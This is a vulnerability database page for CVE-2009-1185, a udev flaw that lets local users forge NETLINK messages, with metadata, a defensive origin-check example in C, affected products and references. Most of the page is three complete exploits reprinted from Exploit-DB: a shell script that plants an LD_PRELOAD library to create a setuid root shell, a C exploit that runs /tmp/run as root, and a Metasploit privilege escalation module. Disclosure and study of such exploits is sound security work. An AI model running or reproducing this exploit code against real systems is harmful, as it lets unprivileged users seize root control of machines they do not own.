CVE-2009-1185 : Detail


A07 - Identification and Authentication Failures
EPSS: 0.06%
V3
Local
Published: 2009-04-17 12h00 +00:00
Last modified: 2018-10-10 16h57 +00:00

CVE Description

udev before 1.4.1 does not verify whether a NETLINK message originates from kernel space, which allows local users to gain privileges by sending a NETLINK message from user space.

CVE Information

Related Weaknesses

CWE-ID    Weakness Name              Source
CWE-346   Origin Validation Error
          The product does not properly verify that the source of data or communication is valid.
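The weakness described above is the absence of an origin check on the receiving side. A netlink datagram's sender address, which recvmsg() stores in msg_name, distinguishes the kernel (nl_pid 0, delivered through the uevent multicast group) from any userspace process (a non-zero nl_pid assigned at bind time, unicast only). The following C program is an added example, not udev's code or the code of any project on this page; it shows the check a uevent consumer needs before trusting a message and a bounds-checked lookup over the NUL-separated KEY=VALUE payload format the exploits on this page construct. The helper names (uevent_from_kernel, uevent_get, poll_one_uevent), the UEVENT_KERNEL_GROUP constant and the sample payload are constructed for this example.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
#define UEVENT_KERNEL_GROUP 1u  /* multicast group the kernel publishes uevents to */

/* Origin check (constructed for this example). recvmsg() stores the SENDER's
 * address in msg_name: kernel uevents carry nl_pid 0 and the multicast group
 * bit; a userspace sender is assigned a non-zero nl_pid at bind() and can only
 * unicast (nl_groups 0) without CAP_NET_ADMIN. Returns 1 for a kernel origin. */
int uevent_from_kernel(const struct sockaddr_nl *snl, socklen_t addrlen)
{
    if (addrlen < sizeof(*snl) || snl->nl_family != AF_NETLINK)
        return 0;                            /* truncated or foreign address */
    if (snl->nl_pid != 0)
        return 0;                            /* unicast from another process */
    if ((snl->nl_groups & UEVENT_KERNEL_GROUP) == 0)
        return 0;                            /* not via the kernel's group */
    return 1;
}

/* Bounds-checked lookup of KEY in a payload laid out as
 * "ACTION@DEVPATH\0KEY=VALUE\0..."; returns VALUE inside buf or NULL. */
const char *uevent_get(const char *buf, size_t len, const char *key)
{
    size_t klen = strlen(key);
    const char *end = buf + len, *p = memchr(buf, '\0', len);

    if (p == NULL)
        return NULL;                         /* header not terminated */
    for (p++; p < end; ) {
        const char *nul = memchr(p, '\0', (size_t)(end - p));
        if (nul == NULL)
            return NULL;                     /* last string runs off the end */
        if ((size_t)(nul - p) > klen && memcmp(p, key, klen) == 0 && p[klen] == '=')
            return p + klen + 1;
        p = nul + 1;
    }
    return NULL;
}

/* Constructed sample payload in the kernel's uevent format (not a capture). */
static const char sample_uevent[] =
    "add@/devices/virtual/block/loop0\0" "ACTION=add\0"
    "DEVPATH=/devices/virtual/block/loop0\0" "SUBSYSTEM=block\0"
    "MAJOR=7\0" "MINOR=0";
static const size_t sample_uevent_len = sizeof(sample_uevent);  /* incl. final NUL */

/* Read one queued uevent without blocking and apply both checks.
 * Returns 1 if a kernel uevent was accepted, 0 if none was pending or a
 * userspace datagram was dropped, -1 if the socket could not be set up. */
int poll_one_uevent(void)
{
    struct sockaddr_nl local = { .nl_family = AF_NETLINK, .nl_groups = UEVENT_KERNEL_GROUP };
    struct sockaddr_nl peer;
    char buf[8192];
    struct iovec iov = { .iov_base = buf, .iov_len = sizeof buf };
    struct msghdr msg = { .msg_name = &peer, .msg_namelen = sizeof peer,
                          .msg_iov = &iov, .msg_iovlen = 1 };
    int sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
    ssize_t n;

    if (sock < 0)
        return -1;
    if (bind(sock, (struct sockaddr *)&local, sizeof local) < 0) {
        close(sock);
        return -1;
    }
    n = recvmsg(sock, &msg, MSG_DONTWAIT);
    close(sock);
    if (n < 0)
        return 0;                            /* EAGAIN: nothing queued */
    if (!uevent_from_kernel(&peer, msg.msg_namelen)) {
        fprintf(stderr, "dropped %zd-byte datagram from nl_pid %u\n", n, peer.nl_pid);
        return 0;
    }
    const char *action = uevent_get(buf, (size_t)n, "ACTION");
    const char *devpath = uevent_get(buf, (size_t)n, "DEVPATH");
    printf("kernel uevent: ACTION=%s DEVPATH=%s\n",
           action ? action : "?", devpath ? devpath : "?");
    return 1;
}

int main(void)
{
    /* Constructed sender addresses as recvmsg() would report them. */
    struct sockaddr_nl kernel = { .nl_family = AF_NETLINK, .nl_groups = UEVENT_KERNEL_GROUP };
    struct sockaddr_nl user = { .nl_family = AF_NETLINK, .nl_pid = 4242 };
    printf("kernel address accepted: %d\n", uevent_from_kernel(&kernel, sizeof kernel));
    printf("user address accepted:   %d\n", uevent_from_kernel(&user, sizeof user));
    printf("sample payload ACTION=%s\n", uevent_get(sample_uevent, sample_uevent_len, "ACTION"));
    printf("live poll result: %d\n", poll_one_uevent());
    return 0;
}
```

poll_one_uevent() opens a real NETLINK_KOBJECT_UEVENT socket and reads at most one already-queued event with MSG_DONTWAIT, so it returns 0 immediately when nothing is pending rather than blocking; on current kernels an unprivileged process can bind to the uevent group, so the program runs without root. Note that the payload parser alone cannot tell a forged message from a genuine one (kcope's exploit builds a syntactically valid payload that merely adds an LD_PRELOAD key), which is why the sender-address check must come first.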

Metrics

Metrics   Score   Severity   CVSS Vector                   Source
V2        7.2                AV:L/AC:L/Au:N/C:C/I:C/A:C    [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs by their EPSS scores. For example, a CVE in the 95th percentile is more likely to be exploited than 95% of all other CVEs. The percentile is therefore the way to compare one CVE's EPSS score against the rest.

Exploit information

Exploit Database EDB-ID : 8478

Publication date : 2009-04-19 22h00 +00:00
Author : kingcope
EDB Verified : Yes

#!/bin/sh
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique
# by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#
# WARNING: maybe needs some FIXUP to work flawlessly
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang

cat > udev.c << _EOF
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif

#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096

#define TRUE 1
#define FALSE 0

int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;

main(int argc, char **argv) {
    char sysfspath[SHORT_STRING];
    char subsystem[SHORT_STRING];
    char event[SHORT_STRING];
    char major[SHORT_STRING];
    char minor[SHORT_STRING];

    sprintf(event, "add");
    sprintf(subsystem, "block");
    sprintf(sysfspath, "/dev/foo");
    sprintf(major, "8");
    sprintf(minor, "1");

    memset(&address, 0, sizeof(address));
    address.nl_family = AF_NETLINK;
    address.nl_pid = atoi(argv[1]);
    address.nl_groups = 0;

    msg.msg_name = (void*)&address;
    msg.msg_namelen = sizeof(address);
    msg.msg_iov = &iovector;
    msg.msg_iovlen = 1;

    socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
    bind(socket_fd, (struct sockaddr *) &address, sizeof(address));

    char message[LONG_STRING];
    char *mp;
    mp = message;
    mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
    mp += sprintf(mp, "ACTION=%s", event) +1;
    mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
    mp += sprintf(mp, "MAJOR=%s", major) +1;
    mp += sprintf(mp, "MINOR=%s", minor) +1;
    mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
    mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1;

    iovector.iov_base = (void*)message;
    iovector.iov_len = (int)(mp-message);

    char *buf;
    int buflen;
    buf = (char *) &msg;
    buflen = (int)(mp-message);

    sendmsg(socket_fd, &msg, 0);
    close(socket_fd);
    sleep(10);
    execl("/tmp/suid", "suid", (void*)0);
}
_EOF
gcc udev.c -o /tmp/udev

cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    setgid(0);
    setuid(0);
    unsetenv("LD_PRELOAD");
    execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles

cat > suid.c << _EOF
int main(void) {
    setgid(0);
    setuid(0);
    execl("/bin/sh","sh",0);
}
_EOF
gcc -o /tmp/suid suid.c

cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
/tmp/udev $1

# milw0rm.com [2009-04-20]
Exploit Database EDB-ID : 8572

Publication date : 2009-04-29 22h00 +00:00
Author : Jon Oberheide
EDB Verified : Yes

/*
 * cve-2009-1185.c
 *
 * udev < 141 Local Privilege Escalation Exploit
 * Jon Oberheide <[email protected]>
 * http://jon.oberheide.org
 *
 * Information:
 *
 * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185
 *
 * udev before 1.4.1 does not verify whether a NETLINK message originates
 * from kernel space, which allows local users to gain privileges by sending
 * a NETLINK message from user space.
 *
 * Notes:
 *
 * An alternate version of kcope's exploit. This exploit leverages the
 * 95-udev-late.rules functionality that is meant to run arbitrary commands
 * when a device is removed. A bit cleaner and reliable as long as your
 * distro ships that rule file.
 *
 * Tested on Gentoo, Intrepid, and Jaunty.
 *
 * Usage:
 *
 * Pass the PID of the udevd netlink socket (listed in /proc/net/netlink,
 * usually is the udevd PID minus 1) as argv[1].
 *
 * The exploit will execute /tmp/run as root so throw whatever payload you
 * want in there.
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif

int
main(int argc, char **argv)
{
    int sock;
    char *mp, *err;
    char message[4096];
    struct stat st;
    struct msghdr msg;
    struct iovec iovector;
    struct sockaddr_nl address;

    if (argc < 2) {
        err = "Pass the udevd netlink PID as an argument";
        printf("[-] Error: %s\n", err);
        exit(1);
    }

    if ((stat("/etc/udev/rules.d/95-udev-late.rules", &st) == -1) &&
        (stat("/lib/udev/rules.d/95-udev-late.rules", &st) == -1)) {
        err = "Required 95-udev-late.rules not found";
        printf("[-] Error: %s\n", err);
        exit(1);
    }

    if (stat("/tmp/run", &st) == -1) {
        err = "/tmp/run does not exist, please create it";
        printf("[-] Error: %s\n", err);
        exit(1);
    }

    system("chmod +x /tmp/run");

    memset(&address, 0, sizeof(address));
    address.nl_family = AF_NETLINK;
    address.nl_pid = atoi(argv[1]);
    address.nl_groups = 0;

    msg.msg_name = (void*)&address;
    msg.msg_namelen = sizeof(address);
    msg.msg_iov = &iovector;
    msg.msg_iovlen = 1;

    sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
    bind(sock, (struct sockaddr *) &address, sizeof(address));

    mp = message;
    mp += sprintf(mp, "remove@/d") + 1;
    mp += sprintf(mp, "SUBSYSTEM=block") + 1;
    mp += sprintf(mp, "DEVPATH=/dev/foo") + 1;
    mp += sprintf(mp, "TIMEOUT=10") + 1;
    mp += sprintf(mp, "ACTION=remove") +1;
    mp += sprintf(mp, "REMOVE_CMD=/tmp/run") +1;

    iovector.iov_base = (void*)message;
    iovector.iov_len = (int)(mp-message);

    sendmsg(sock, &msg, 0);
    close(sock);

    return 0;
}

// milw0rm.com [2009-04-30]
Exploit Database EDB-ID : 21848

Publication date : 2012-10-09 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/priv'
require 'msf/core/exploit/local/linux_kernel'
require 'msf/core/exploit/local/linux'
require 'msf/core/exploit/local/unix'

#load 'lib/msf/core/post/file.rb'
#load 'lib/msf/core/exploit/local/unix.rb'
#load 'lib/msf/core/exploit/local/linux.rb'
#load 'lib/msf/core/exploit/local/linux_kernel.rb'

class Metasploit4 < Msf::Exploit::Local
  Rank = GreatRanking

  include Msf::Exploit::EXE
  include Msf::Post::File
  include Msf::Post::Common
  include Msf::Exploit::Local::LinuxKernel
  include Msf::Exploit::Local::Linux
  include Msf::Exploit::Local::Unix

  def initialize(info={})
    super( update_info( info, {
      'Name'           => 'Linux udev Netlink Local Privilege Escalation',
      'Description'    => %q{
        Versions of udev < 1.4.1 do not verify that netlink messages are coming
        from the kernel. This allows local users to gain privileges by sending
        netlink messages from userland.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'kcope',          # discovery
          'Jon Oberheide',  # 95-udev-late.rules technique
          'egypt'           # metasploit module
        ],
      'Platform'       => [ 'linux' ],
      'Arch'           => [ ARCH_X86 ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'References'     =>
        [
          [ 'CVE', '2009-1185' ],
          [ 'OSVDB', '53810' ],
          [ 'BID', '34536' ]
        ],
      'Targets'        =>
        [
          [ 'Linux x86', { 'Arch' => ARCH_X86 } ],
          [ 'Linux x64', { 'Arch' => ARCH_X86_64 } ],
          #[ 'Command payload', { 'Arch' => ARCH_CMD } ],
        ],
      'DefaultOptons'  => { 'WfsDelay' => 2 },
      'DefaultTarget'  => 0,
      'DisclosureDate' => "",
    } ))

    register_options([
      OptString.new("WritableDir", [ true, "A directory where we can write files (must not be mounted noexec)", "/tmp" ]),
      OptInt.new("NetlinkPID", [ false, "Usually udevd pid-1. Meterpreter sessions will autodetect" ]),
    ], self.class)
  end

  def exploit
    if datastore["NetlinkPID"] and datastore["NetlinkPID"] != 0
      netlink_pid = datastore["NetlinkPID"]
    else
      print_status("Attempting to autodetect netlink pid...")
      netlink_pid = autodetect_netlink_pid
    end

    if not netlink_pid
      print_error "Couldn't autodetect netlink PID, try specifying it manually."
      print_error "Look in /proc/net/netlink for a PID near that of the udevd process"
      return
    else
      print_good "Found netlink pid: #{netlink_pid}"
    end

    sc = Metasm::ELF.new(@cpu)
    sc.parse %Q|
#define DEBUGGING
#define NULL ((void*)0)
#ifdef __ELF__
.section ".bss" rwx
.section ".text" rwx
.entrypoint
#endif
call main
push eax
call exit
|

    # Set up the same include order as the bionic build system.
    # See external/source/meterpreter/source/bionic/libc/Jamfile
    cparser.lexer.include_search_path = [
      "external/source/meterpreter/source/bionic/libc/include/",
      "external/source/meterpreter/source/bionic/libc/private/",
      "external/source/meterpreter/source/bionic/libc/bionic/",
      "external/source/meterpreter/source/bionic/libc/kernel/arch-x86/",
      "external/source/meterpreter/source/bionic/libc/kernel/common/",
      "external/source/meterpreter/source/bionic/libc/arch-x86/include/",
    ]
    cparser.parse(%Q|
#define DEBUGGING
// Fixes a parse error in bionic's libc/kernel/arch-x86/asm/types.h
#ifndef __extension__
#define __extension__
#endif
// Fixes a parse error in bionic's libc/include/sys/cdefs_elf.h
// Doing #if on an undefined macro is fine in GCC, but a parse error in
// metasm.
#ifndef __STDC__
#define __STDC__ 0
#endif
#include <sys/types.h>
#include <stdarg.h>
#include <stdio.h>
#include <unistd.h>
#include <errno.h>
|)
    [
      "external/source/meterpreter/source/bionic/libc/bionic/__errno.c",
      "external/source/meterpreter/source/bionic/libc/bionic/__set_errno.c",
      "external/source/meterpreter/source/bionic/libc/stdio/stdio.c",
    ].each do |fname|
      cparser.parse(File.read(fname), fname)
    end

    payload_path = "#{datastore["WritableDir"]}/#{Rex::Text.rand_text_alpha(10)}"
    evil_path = "#{datastore["WritableDir"]}/#{Rex::Text.rand_text_alpha(10)}"

    unix_socket_h(sc)
    linux_x86_syscall_wrappers(sc)

    main = %Q^
#include <string.h>
#include <linux/netlink.h>
#define NULL 0

int main() {
  int sock;
  struct iovec iov;
  struct sockaddr_nl sa;
  struct msghdr msg;
  char *mp;
  char message[4096];

  memset(sa, 0, sizeof(sa));
  sa.nl_family = AF_NETLINK;
  sa.nl_pid = #{netlink_pid};
  sa.nl_groups = 0;

  memset(&msg, 0x00, sizeof(struct msghdr));
  msg.msg_name = (void *)&sa;
  msg.msg_namelen = sizeof(sa);
  msg.msg_iov = &iov;
  msg.msg_iovlen = 1;
  msg.msg_control = NULL;
  msg.msg_controllen = 0;
  msg.msg_flags = 0;

  sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
  bind(sock, (struct sockaddr *) &sa, sizeof(sa));

  mp = message;
  mp += sprintf(mp, "remove@/d") + 1;
  mp += sprintf(mp, "SUBSYSTEM=block") + 1;
  mp += sprintf(mp, "DEVPATH=/dev/#{Rex::Text.rand_text_alpha(10)}") + 1;
  mp += sprintf(mp, "TIMEOUT=10") + 1;
  mp += sprintf(mp, "ACTION=remove") +1;
  mp += sprintf(mp, "REMOVE_CMD=#{payload_path}") +1;

  iov.iov_base = (void*)message;
  iov.iov_len = (int)(mp-message);

  sendmsg(sock, &msg, 0);
  close(sock);

  return 0;
}
^
    cparser.parse(main, "main.c")
    asm = cpu.new_ccompiler(cparser, sc).compile
    sc.parse asm
    sc.assemble

    begin
      elf = sc.encode_string
    rescue
      print_error "Metasm Encoding failed: #{$!}"
      elog "Metasm Encoding failed: #{$!.class} : #{$!}"
      elog "Call stack:\n#{$!.backtrace.join("\n")}"
      return
    end

    pl = payload.encoded_exe
    print_status "Writing payload executable (#{pl.length} bytes) to #{payload_path}"
    write_file(payload_path, pl)
    print_status "Writing exploit executable (#{elf.length} bytes) to #{evil_path}"
    write_file(evil_path, elf)
    print_status "chmod'ing and running it..."
    cmd_exec("chmod 755 #{evil_path} #{payload_path}")
    cmd_exec("#{evil_path}")
    rm_f(evil_path, payload_path)
  end

  def autodetect_netlink_pid
    netlink_pid = nil
    case session.type
    when "meterpreter"
      print_status("Meterpreter session, using get_processes to find netlink pid")
      process_list = session.sys.process.get_processes
      udev_proc = process_list.find {|p| p["name"] =~ /udevd/ }
      udev_pid = udev_proc["pid"]
      print_status "udev pid: #{udev_pid}"
      netlink = read_file("/proc/net/netlink")
      netlink.each_line do |line|
        pid = line.split(/\s+/)[2].to_i
        if pid == udev_pid - 1
          netlink_pid = pid
          break
        end
      end
    else
      print_status("Shell session, trying sh script to find netlink pid")
      netlink_pid = cmd_exec( %q^
for netlink_pid in $(awk '{print $3}' /proc/net/netlink |sort -u|grep -v -- -); do
  for udev_pid in $(ps aux | grep [u]devd | awk '{print $2}'); do
    [ $(( $udev_pid-1 )) = $netlink_pid ] && echo $netlink_pid ;
  done;
done
^)
      netlink_pid = nil if netlink_pid.empty?
    end

    netlink_pid
  end

end

Products Mentioned

Configuration 0

Udev_project>>Udev >> Version To (excluding) 141

Configuration 0

Suse>>Linux_enterprise_debuginfo >> Version 10

Suse>>Linux_enterprise_debuginfo >> Version 11

Opensuse>>Opensuse >> Version 10.3

Opensuse>>Opensuse >> Version 11.0

Opensuse>>Opensuse >> Version 11.1

Suse>>Linux_enterprise_desktop >> Version 10

Suse>>Linux_enterprise_desktop >> Version 11

Suse>>Linux_enterprise_server >> Version 10

Suse>>Linux_enterprise_server >> Version 11

Configuration 0

Debian>>Debian_linux >> Version 4.0

Debian>>Debian_linux >> Version 5.0

Configuration 0

Canonical>>Ubuntu_linux >> Version 6.06

Canonical>>Ubuntu_linux >> Version 7.10

Canonical>>Ubuntu_linux >> Version 8.04

Canonical>>Ubuntu_linux >> Version 8.10

Configuration 0

Fedoraproject>>Fedora >> Version 9

Fedoraproject>>Fedora >> Version 10

Configuration 0

Juniper>>Ctpview >> Version To (excluding) 7.1

Juniper>>Ctpview >> Version 7.1

Juniper>>Ctpview >> Version 7.1

Juniper>>Ctpview >> Version 7.2

References

http://secunia.com/advisories/34801
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/35766
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.mandriva.com/security/advisories?name=MDVSA-2009:104
Tags : vendor-advisory, x_refsource_MANDRIVA
http://www.debian.org/security/2009/dsa-1772
Tags : vendor-advisory, x_refsource_DEBIAN
http://www.gentoo.org/security/en/glsa/glsa-200904-18.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://www.vupen.com/english/advisories/2009/1865
Tags : vdb-entry, x_refsource_VUPEN
http://www.securityfocus.com/bid/34536
Tags : vdb-entry, x_refsource_BID
http://www.securitytracker.com/id?1022067
Tags : vdb-entry, x_refsource_SECTRACK
http://www.redhat.com/support/errata/RHSA-2009-0427.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.mandriva.com/security/advisories?name=MDVSA-2009:103
Tags : vendor-advisory, x_refsource_MANDRIVA
http://secunia.com/advisories/34776
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/34731
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/34753
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/34785
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/34787
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2009/1053
Tags : vdb-entry, x_refsource_VUPEN
http://www.ubuntu.com/usn/usn-758-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://secunia.com/advisories/34771
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/34750
Tags : third-party-advisory, x_refsource_SECUNIA
https://www.exploit-db.com/exploits/8572
Tags : exploit, x_refsource_EXPLOIT-DB